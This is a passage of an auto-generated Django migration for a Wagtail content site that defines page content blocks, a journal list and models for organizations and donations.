wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.CreateModel(
name='VersionedRedirect',
fields=[
('versioned_redirect_page', modelcluster.fields.ParentalKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='versioned_redirects', to='wagtailcore.Page', verbose_name='redirect to a page')),
('redirect_ptr', models.OneToOneField(auto_created=True, default=1, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailredirects.Redirect')),
],
bases=('wagtailredirects.redirect',),
),
migrations.CreateModel(
name='Journal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, unique=True)),
('area', models.CharField(blank=True, max_length=255)),
('association', models.CharField(blank=True, max_length=255)),
('is_featured_journal', models.BooleanField(default=False)),
('is_preregistered_journal', models.BooleanField(default=False)),
('is_registered_journal', models.BooleanField(default=False)),
('is_special_journal', models.BooleanField(default=False)),
('is_top_journal', models.BooleanField(default=False)),
('publisher', models.CharField(blank=True, max_length=255)),
('notes', wagtail.wagtailcore.fields.StreamField((('note', wagtail.wagtailcore.blocks.StructBlock((('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=False)), ('link', wagtail.wagtailcore.blocks.URLBlock(required=False))))),), blank=True)),
('url_link', models.URLField(blank=True)),
],
options={
'ordering': ['title'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
options={
'ordering': ['name'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals')),)))), blank=True, null=True),
),
migrations.CreateModel(
name='Donation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('amount', models.IntegerField(blank=True, null=True)),
('thank_you_message', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('organization', modelcluster.fields.ParentalKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='donations', to='common.Organization', verbose_name='Organization')),
],
options={
'ordering': ['date'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals')),))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AddField(
model_name='organization',
name='logo',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.AddField(
model_name='organization',
name='partner',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AlterField(
model_name='footer',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('columns', common.blocks.columns.RowBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('username', wagtail.wagtailcore.blocks.CharBlock(required=True))))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock()))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])),))), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AddField(
model_name='person',
name='github',
field=models.URLField(blank=True),
),
migrations.AddField(
model_name='person',
name='google_plus',
field=models.URLField(blank=True),
),
migrations.AddField(
model_name='person',
name='twitter',
field=models.URLField(blank=True),
),
migrations.CreateModel(
name='InkindDonation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('thank_you_message', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('organization', modelcluster.fields.ParentalKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inkind_donations', to='common.Organization', verbose_name='Organization')),
],
options={
'ordering': ['date'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
migrations.AddField(
model_name='organization',
name='url',
field=models.URLField(blank=True),
),
migrations.AddField(
model_name='organization',
name='introduction',
field=wagtail.wagtailcore.fields.RichTextField(blank=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', 